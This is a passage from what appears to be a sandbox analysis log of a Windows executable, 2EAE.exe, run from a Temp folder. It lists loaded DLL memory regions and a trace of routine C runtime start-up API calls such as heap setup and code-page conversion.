mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2354 start_va = 0x762b0000 end_va = 0x7646cfff monitored = 0 entry_point = 0x76392a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2355 start_va = 0x76c00000 end_va = 0x76cacfff monitored = 0 entry_point = 0x76c14f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2356 start_va = 0x73f00000 end_va = 0x73f1dfff monitored = 0 entry_point = 0x73f0b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2357 start_va = 0x73ef0000 end_va = 0x73ef9fff monitored = 0 entry_point = 0x73ef2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2358 start_va = 0x76840000 end_va = 0x76897fff monitored = 0 entry_point = 0x768825c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2359 start_va = 0x76cb0000 end_va = 0x76cf3fff monitored = 0 entry_point = 0x76cc9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2360 start_va = 0x1f40000 end_va = 0x203ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f40000" filename = "" Region: id = 2361 start_va = 0x2130000 end_va = 0x213ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002130000" filename = "" Region: id = 2362 start_va = 0x2140000 end_va = 0x228ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Region: id = 2364 start_va = 0x764e0000 end_va = 0x765fefff monitored = 0 entry_point = 0x76525980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2365 start_va = 0x580000 end_va = 0x580fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 2366 start_va = 0x1f40000 end_va = 0x1ffbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f40000" filename = "" Region: id = 2367 start_va = 0x2030000 end_va = 0x203ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002030000" filename = "" Region: id = 2368 start_va = 0x580000 end_va = 0x583fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 2369 start_va = 0x713a0000 end_va = 0x713bcfff monitored = 0 entry_point = 0x713a3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2370 start_va = 0x590000 end_va = 0x592fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 2386 start_va = 0x590000 end_va = 0x590fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Thread: id = 125 os_tid = 0x480 [0136.128] GetStartupInfoA (in: lpStartupInfo=0x19ff18 | out: lpStartupInfo=0x19ff18*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0136.128] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x2130000 [0136.166] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76720000 [0136.166] GetProcAddress (hModule=0x76720000, lpProcName="FlsAlloc") returned 0x7673a980 [0136.166] GetProcAddress (hModule=0x76720000, lpProcName="FlsGetValue") returned 0x76737570 [0136.166] GetProcAddress (hModule=0x76720000, lpProcName="FlsSetValue") returned 0x76739e30 [0136.170] GetProcAddress (hModule=0x76720000, lpProcName="FlsFree") returned 0x76744ff0 [0136.171] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76720000 [0136.171] GetProcAddress (hModule=0x76720000, lpProcName="EncodePointer") returned 0x7722f730 [0136.171] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76720000 [0136.171] GetProcAddress (hModule=0x76720000, lpProcName="EncodePointer") returned 0x7722f730 [0136.171] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76720000 [0136.171] GetProcAddress (hModule=0x76720000, lpProcName="EncodePointer") returned 0x7722f730 [0136.172] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76720000 [0136.172] GetProcAddress (hModule=0x76720000, lpProcName="EncodePointer") returned 0x7722f730 [0136.172] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76720000 [0136.172] GetProcAddress (hModule=0x76720000, lpProcName="EncodePointer") returned 0x7722f730 [0136.172] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76720000 [0136.172] GetProcAddress (hModule=0x76720000, lpProcName="EncodePointer") returned 0x7722f730 [0136.172] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76720000 [0136.172] GetProcAddress (hModule=0x76720000, lpProcName="EncodePointer") returned 0x7722f730 [0136.173] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76720000 [0136.173] GetProcAddress (hModule=0x76720000, lpProcName="DecodePointer") returned 0x7722d830 [0136.173] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x238) returned 0x21305a8 [0136.173] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76720000 [0136.173] GetProcAddress (hModule=0x76720000, lpProcName="DecodePointer") returned 0x7722d830 [0136.174] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76720000 [0136.174] GetProcAddress (hModule=0x76720000, lpProcName="EncodePointer") returned 0x7722f730 [0136.174] GetProcAddress (hModule=0x76720000, lpProcName="DecodePointer") returned 0x7722d830 [0136.174] GetCurrentThreadId () returned 0x480 [0136.174] GetStartupInfoA (in: lpStartupInfo=0x19fe84 | out: lpStartupInfo=0x19fe84*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0136.174] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x824) returned 0x21307e8 [0136.175] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0136.175] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0136.175] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0136.175] SetHandleCount (uNumber=0x20) returned 0x20 [0136.175] GetCommandLineA () returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe" [0136.175] GetEnvironmentStringsW () returned 0x730cf8* [0136.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1410, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1410 [0136.175] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x5a6) returned 0x2131018 [0136.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1410, lpMultiByteStr=0x2131038, cbMultiByte=1410, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1410 [0136.175] FreeEnvironmentStringsW (penv=0x730cf8) returned 1 [0136.175] GetLastError () returned 0x0 [0136.175] SetLastError (dwErrCode=0x0) [0136.176] GetLastError () returned 0x0 [0136.176] SetLastError (dwErrCode=0x0) [0136.176] GetLastError () returned 0x0 [0136.176] SetLastError (dwErrCode=0x0) [0136.176] GetACP () returned 0x4e4 [0136.176] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x244) returned 0x21315c8 [0136.176] GetLastError () returned 0x0 [0136.176] SetLastError (dwErrCode=0x0) [0136.176] IsValidCodePage (CodePage=0x4e4) returned 1 [0136.176] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fe4c | out: lpCPInfo=0x19fe4c) returned 1 [0136.176] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f910 | out: lpCPInfo=0x19f910) returned 1 [0136.176] GetLastError () returned 0x0 [0136.176] SetLastError (dwErrCode=0x0) [0136.176] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x19f8a8 | out: lpCharType=0x19f8a8) returned 1 [0136.176] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f928, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0136.176] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x22c) returned 0x2131818 [0136.176] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f928, cbMultiByte=256, lpWideCharStr=0x2131840, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽") returned 256 [0136.177] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽", cchSrc=256, lpCharType=0x19fc30 | out: lpCharType=0x19fc30) returned 1 [0136.177] HeapValidate (hHeap=0x2130000, dwFlags=0x0, lpMem=0x2131818) returned 1 [0136.189] HeapFree (in: hHeap=0x2130000, dwFlags=0x0, lpMem=0x2131818 | out: hHeap=0x2130000) returned 1 [0136.190] GetLastError () returned 0x0 [0136.190] SetLastError (dwErrCode=0x0) [0136.190] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0136.190] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f928, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0136.190] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x22c) returned 0x2131818 [0136.190] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f928, cbMultiByte=256, lpWideCharStr=0x2131840, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽") returned 256 [0136.194] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0136.194] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x22c) returned 0x2131a50 [0136.194] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽", cchSrc=256, lpDestStr=0x2131a78, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽") returned 256 [0136.194] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽", cchWideChar=256, lpMultiByteStr=0x19fb30, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0136.195] HeapValidate (hHeap=0x2130000, dwFlags=0x0, lpMem=0x2131a50) returned 1 [0136.195] HeapFree (in: hHeap=0x2130000, dwFlags=0x0, lpMem=0x2131a50 | out: hHeap=0x2130000) returned 1 [0136.195] HeapValidate (hHeap=0x2130000, dwFlags=0x0, lpMem=0x2131818) returned 1 [0136.195] HeapFree (in: hHeap=0x2130000, dwFlags=0x0, lpMem=0x2131818 | out: hHeap=0x2130000) returned 1 [0136.195] GetLastError () returned 0x0 [0136.196] SetLastError (dwErrCode=0x0) [0136.196] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f928, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0136.196] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x22c) returned 0x2131818 [0136.196] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f928, cbMultiByte=256, lpWideCharStr=0x2131840, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽") returned 256 [0136.196] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0136.196] RtlAllocateHeap (HeapHandle=0x2130000, Flags=0x0, Size=0x22c) returned 0x2131a50 [0136.196] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽", cchSrc=256, lpDestStr=0x2131a78, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ﷽﷽") returned 256 [0136.196] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ﷽﷽", cchWideChar=256, lpMultiByteStr=0x19fa30, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0136.196] HeapValidate (hHeap=0x2130000, dwFlags=0x0, lpMem=0x2131a50) returned 1 [0136.196] HeapFree (in: hHeap=0x2130000, dwFlags=0x0, lpMem=0x2131a50 | out: hHeap=0x2130000) returned 1 [0136.196] HeapValidate (hHeap=0x2130000, dwFlags=0x0, lpMem=0x2131818) returned 1 [0136.197] HeapFree (in: hHeap=0x2130000, dwFlags=0x0, lpMem=0x2131818 | out: hHeap=0x2130000) returned 1 [0136.197] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x45cba0, nSize=0x104 | out: lpFilename="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe" (normalized: 